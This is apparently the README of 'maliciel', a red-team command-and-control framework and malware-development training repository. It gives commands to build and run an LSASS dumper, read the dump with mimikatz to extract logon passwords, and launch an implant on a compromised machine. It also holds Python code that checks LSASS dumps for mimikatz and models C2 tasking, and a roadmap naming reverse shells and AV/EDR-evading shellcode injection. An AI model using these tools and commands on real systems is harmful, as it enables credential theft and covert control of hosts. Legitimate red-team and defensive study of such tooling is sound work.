maliciel

A custom C2 made for red team operations.
Explore the docs »

Report Bug · Request Feature

Table of Contents
  1. About The Project
  2. Getting Started
  3. Usage
  4. Roadmap
  5. Contributing
  6. Acknowledgments

About The Project

maliciel is a project about C2 creation and malware-development (maldev) training.

The project is divided into two parts: the first is a Command and Control (C2) server used to generate and control implants; the second is a resource base for maldev training.

The C2 arose from a need for a customised Red Team solution, as existing tools had proven of limited effectiveness. The goal is a tool that generates implants which are discreet, resilient and not flagged by AV/EDR solutions, and that can control those implants once deployed.

(back to top)

Repository Organization

The "Project" folder contains the technical solution (maliciel). It is currently composed of three subfolders: "C2", which contains the server and the CLI interface; "Implant", which holds the source code of the implant; and "Maliciel", a shellcode and code-injector launcher designed to evade AV/EDR detection.

The "Documentation" folder contains all documentation needed to understand and continue the project.

(back to top)

Getting Started

Prerequisites

The following software is required for the project to work:

  • Python >= 3.9
  • Docker >= 20.10
  • docker-compose >= 1.29
  • MinGW-w64 >= 10.2

Installation

  1. Clone the repo
    git clone https://github.com/SeraRepo/maliciel.git
  2. Install the CLI interface
    • Install the python dependencies
      cd Project/C2/CLI
      python3 -m pip install -r requirements.txt
    • Launch the CLI
      python3 maliciel-C2.py
  3. Install the C2 server
    • On the machine or cloud you want the server to be
    • Clone the repo
      git clone https://github.com/SeraRepo/maliciel.git
    • Launch the server
      cd Project/C2/
      docker-compose up
  4. Install Packages
    • Install VCPKG
       git clone https://github.com/Microsoft/vcpkg.git
       .\vcpkg\bootstrap-vcpkg.bat
    • Install packages
       .\vcpkg.exe integrate install
       .\vcpkg.exe install boost-uuid:x64-windows
       .\vcpkg.exe install boost-property-tree:x64-windows
       .\vcpkg.exe install boost-system:x64-windows
       .\vcpkg.exe install cpr:x64-windows
       .\vcpkg.exe install nlohmann-json:x64-windows
  5. Dump LSASS
    • Compile with MinGW [LINUX]
       cd Project/Implant/maliciel/Dump
       x86_64-w64-mingw32-g++ -O2 dump.cpp -o dump.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive -ldbghelp
    • Dump LSASS [WIN]
       .\dump.exe namedump.dmp
      Writing a minidump of lsass.exe requires an elevated prompt (SeDebugPrivilege) and fails when LSA protection (RunAsPPL) is enabled. The resulting .dmp holds cached credentials in clear: treat it as sensitive material and delete it once it has been processed.
    • Read the dump with Mimikatz [WIN]
       .\mimikatz.exe
       sekurlsa::minidump c:\pathOfDump\namedump.dmp
       sekurlsa::logonpasswords
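Before copying a dump off the target and feeding it to sekurlsa::minidump, it is worth checking that dump.exe actually produced a complete minidump: a truncated file, or one written without MiniDumpWithFullMemory, loads in mimikatz but yields nothing. The following checker is an added example, not part of maliciel; it parses the MINIDUMP_HEADER and stream directory as laid out in DbgHelp's minidumpapiset.h, reports the OS build and architecture from the SystemInfo stream, and flags the streams sekurlsa needs (ModuleList, SystemInfo, Memory64List) when they are absent. The sample dump it builds for itself is constructed test input with empty stream bodies, not a real LSASS dump.

```python
# Added example (not part of maliciel): sanity-check a minidump before loading
# it with mimikatz. Layout constants come from DbgHelp's minidumpapiset.h.
import struct

MDMP_SIGNATURE = 0x504D444D              # 'MDMP' read as a little-endian ULONG32
MINIDUMP_VERSION = 0xA793                # low 16 bits of MINIDUMP_HEADER.Version
MINIDUMP_WITH_FULL_MEMORY = 0x00000002   # MINIDUMP_TYPE flag passed to MiniDumpWriteDump

# MINIDUMP_STREAM_TYPE values that matter here
MODULE_LIST_STREAM = 4
SYSTEM_INFO_STREAM = 7
MEMORY64_LIST_STREAM = 9
# sekurlsa::minidump needs the module list (to find lsasrv.dll and friends), the
# system info (the OS build selects the credential structure layouts) and the
# 64-bit memory range list that carries the actual process memory.
REQUIRED_STREAMS = {MODULE_LIST_STREAM, SYSTEM_INFO_STREAM, MEMORY64_LIST_STREAM}
ARCH_NAMES = {0: "x86", 9: "AMD64", 12: "ARM64"}   # PROCESSOR_ARCHITECTURE_*

# MINIDUMP_HEADER: Signature, Version, NumberOfStreams, StreamDirectoryRva, CheckSum, TimeDateStamp, Flags
HEADER = struct.Struct("<IIIIIIQ")
# MINIDUMP_DIRECTORY: StreamType, Location.DataSize, Location.Rva
DIRECTORY = struct.Struct("<III")
# Leading fields of MINIDUMP_SYSTEM_INFO: arch, level, revision, cpu count, product type, major, minor, build
SYSTEM_INFO = struct.Struct("<HHHBBIII")


def parse_minidump(data: bytes) -> dict:
    """Parse header and stream directory; raise ValueError on anything malformed or truncated."""
    if len(data) < HEADER.size:
        raise ValueError("shorter than MINIDUMP_HEADER")
    sig, version, nstreams, dir_rva, _checksum, _timestamp, flags = HEADER.unpack_from(data, 0)
    if sig != MDMP_SIGNATURE:
        raise ValueError(f"bad signature {sig:#010x}, expected 'MDMP'")
    if version & 0xFFFF != MINIDUMP_VERSION:
        raise ValueError(f"unexpected minidump version {version & 0xFFFF:#06x}")
    streams = {}
    for i in range(nstreams):
        entry = dir_rva + i * DIRECTORY.size
        if entry + DIRECTORY.size > len(data):
            raise ValueError("stream directory runs past end of file")
        stype, size, rva = DIRECTORY.unpack_from(data, entry)
        if rva + size > len(data):   # MiniDumpWriteDump failed part-way or the file was cut during transfer
            raise ValueError(f"stream {stype} points past end of file")
        streams[stype] = (rva, size)
    report = {
        "full_memory": bool(flags & MINIDUMP_WITH_FULL_MEMORY),
        "streams": streams,
        "missing": sorted(REQUIRED_STREAMS - set(streams)),
        "system_info": None,
    }
    if SYSTEM_INFO_STREAM in streams:
        rva, size = streams[SYSTEM_INFO_STREAM]
        if size >= SYSTEM_INFO.size:
            arch, _lvl, _rev, ncpu, _ptype, major, minor, build = SYSTEM_INFO.unpack_from(data, rva)
            report["system_info"] = {"arch": ARCH_NAMES.get(arch, arch), "cpus": ncpu,
                                     "version": f"{major}.{minor}.{build}"}
    return report


def problems(report: dict) -> list:
    """Human-readable reasons sekurlsa::minidump is likely to fail on this file."""
    out = [f"missing stream type {t}" for t in report["missing"]]
    if not report["full_memory"]:
        out.append("dump was not taken with MiniDumpWithFullMemory; LSASS heaps may be absent")
    return out


def build_sample_dump(include=(MODULE_LIST_STREAM, SYSTEM_INFO_STREAM, MEMORY64_LIST_STREAM),
                      flags=MINIDUMP_WITH_FULL_MEMORY) -> bytes:
    """Constructed test input, not a real LSASS dump: valid header and directory, empty stream bodies."""
    bodies = {
        MODULE_LIST_STREAM: struct.pack("<I", 0),                    # NumberOfModules = 0
        # AMD64, 4 CPUs, workstation, 10.0.19041; PlatformId and CSDVersionRva zeroed
        SYSTEM_INFO_STREAM: SYSTEM_INFO.pack(9, 0, 0, 4, 1, 10, 0, 19041) + b"\0" * 8,
        MEMORY64_LIST_STREAM: struct.pack("<QQ", 0, 0),              # NumberOfMemoryRanges = 0, BaseRva = 0
    }
    selected = [t for t in bodies if t in include]
    body_rva = HEADER.size + DIRECTORY.size * len(selected)
    directory, payload = b"", b""
    for t in selected:
        directory += DIRECTORY.pack(t, len(bodies[t]), body_rva + len(payload))
        payload += bodies[t]
    header = HEADER.pack(MDMP_SIGNATURE, MINIDUMP_VERSION, len(selected), HEADER.size, 0, 0, flags)
    return header + directory + payload


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_dump()
    rep = parse_minidump(data)
    print(rep["system_info"], problems(rep) or "looks loadable by sekurlsa::minidump")
```

Run it as `python3 checkdump.py namedump.dmp` on the operator side; with no argument it checks its own constructed sample. The checker deliberately refuses to read past the file end, so a dump cut short by a failed MiniDumpWriteDump call shows up as an error rather than as an empty result set later in mimikatz.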

(back to top)

Usage

Maliciel

See the README.md in the maliciel folder.

C2

  1. Launch the C2 server, either locally or on a cloud server
    cd C2/
    sudo docker-compose up
  2. Change the IP address of the server in the CLI ('C2/CLI/maliciel-C2.py')

  3. Compile the implant with Visual Studio

    Open Implant/maliciel.sln in Visual Studio

    Run the Build command

  4. Launch the executable on the compromised machine

  5. Send commands to the C2 server via the CLI

    • Send a command

      python maliciel-C2.py add-task --task-type [task_name] --option [option1],[option2]
    • List commands sent

      python maliciel-C2.py list-tasks
    • List results returned

      python maliciel-C2.py list-results
    • List history

      python maliciel-C2.py list-history
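The four CLI verbs above map onto one tasking lifecycle: a task is queued with a type and a comma-separated option string, handed to the implant when it polls, and completed when the implant posts a result; everything in between is recorded as history. The model below is an added example written for this README, not maliciel's own server or CLI code. It keeps the state in memory and simulates the implant side in-process; the task type name, the implant id and the JSON message shapes exchanged with the implant are assumptions, chosen to show the checks a C2 should make (unknown or already-completed task ids and malformed payloads are rejected and logged rather than stored).

```python
# Added example (not maliciel's own code): the tasking lifecycle behind the
# four CLI verbs, with the implant side simulated in-process. Task type names,
# the JSON message shapes and the implant id are assumptions.
import json
import uuid
from dataclasses import asdict, dataclass, field
from datetime import datetime, timezone


def _now() -> str:
    return datetime.now(timezone.utc).isoformat(timespec="seconds")


@dataclass
class Task:
    task_id: str
    task_type: str
    options: list
    status: str = "pending"            # pending -> dispatched -> done
    created: str = field(default_factory=_now)


class Tasking:
    """What the C2 server keeps: queued tasks, returned results and an audit history."""

    def __init__(self):
        self.tasks = {}
        self.results = {}
        self.history = []

    # add-task --task-type <name> --option a,b
    def add_task(self, task_type: str, option: str = "") -> Task:
        options = [o for o in option.split(",") if o]   # the CLI's comma-separated --option value
        task = Task(uuid.uuid4().hex, task_type, options)
        self.tasks[task.task_id] = task
        self.history.append((_now(), "add-task", task.task_id, task_type))
        return task

    # Implant -> C2 poll. The reply is the JSON the implant would parse; tasks
    # handed out are marked dispatched so a second poll does not repeat them.
    def checkin(self, implant_id: str) -> str:
        pending = [t for t in self.tasks.values() if t.status == "pending"]
        for t in pending:
            t.status = "dispatched"
        self.history.append((_now(), "checkin", implant_id, [t.task_id for t in pending]))
        return json.dumps([{"task_id": t.task_id, "task_type": t.task_type, "options": t.options}
                           for t in pending])

    # Implant -> C2 result post: {"task_id": "...", "output": "..."}.
    # Only a task that was actually dispatched can be completed, so a stray or
    # replayed message cannot create or overwrite results.
    def submit_result(self, implant_id: str, payload: str) -> bool:
        try:
            msg = json.loads(payload)
        except ValueError:
            self.history.append((_now(), "rejected-result", implant_id, "malformed json"))
            return False
        task_id = msg.get("task_id") if isinstance(msg, dict) else None
        task = self.tasks.get(task_id)
        if task is None or task.status != "dispatched":
            self.history.append((_now(), "rejected-result", implant_id, task_id))
            return False
        task.status = "done"
        self.results[task.task_id] = {"implant": implant_id, "output": str(msg.get("output", ""))}
        self.history.append((_now(), "result", implant_id, task.task_id))
        return True

    # list-tasks / list-results / list-history
    def list_tasks(self) -> list:
        return [asdict(t) for t in self.tasks.values()]

    def list_results(self) -> dict:
        return dict(self.results)

    def list_history(self) -> list:
        return list(self.history)


if __name__ == "__main__":
    c2 = Tasking()
    task = c2.add_task("dump_lsass", "C:\\Windows\\Temp\\lsass.dmp")   # assumed task type name
    print("implant receives:", c2.checkin("implant-1"))
    c2.submit_result("implant-1", json.dumps({"task_id": task.task_id, "output": "dump written"}))
    print(c2.list_results())
    for entry in c2.list_history():
        print(entry)
```

In a real deployment the same three transitions happen over the implant's HTTP requests to the containerised server instead of direct method calls, and the history is what you review after an operation to reconcile which implant executed which task and when.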

(back to top)

Roadmap

  • Create the C2 server
  • Create the CLI interface
  • Create the basic implant
    • Communication with the C2
    • Accept commands
    • Spawn a reverse shell
    • Extract LSASS credentials
  • Create the shellcode injector generator
  • Add Linux compilation for the implant
  • Rework the CLI interface
  • Add the generator to the solution
  • Create a C++ shellcode generator
  • Add fileless shellcode to the shellcode injector generator

See the open issues for a full list of proposed features (and known issues).

(back to top)

Contributing

Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.

If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!

  1. Fork the Project
  2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
  3. Commit your Changes (git commit -m 'Add some AmazingFeature')
  4. Push to the Branch (git push origin feature/AmazingFeature)
  5. Open a Pull Request

(back to top)
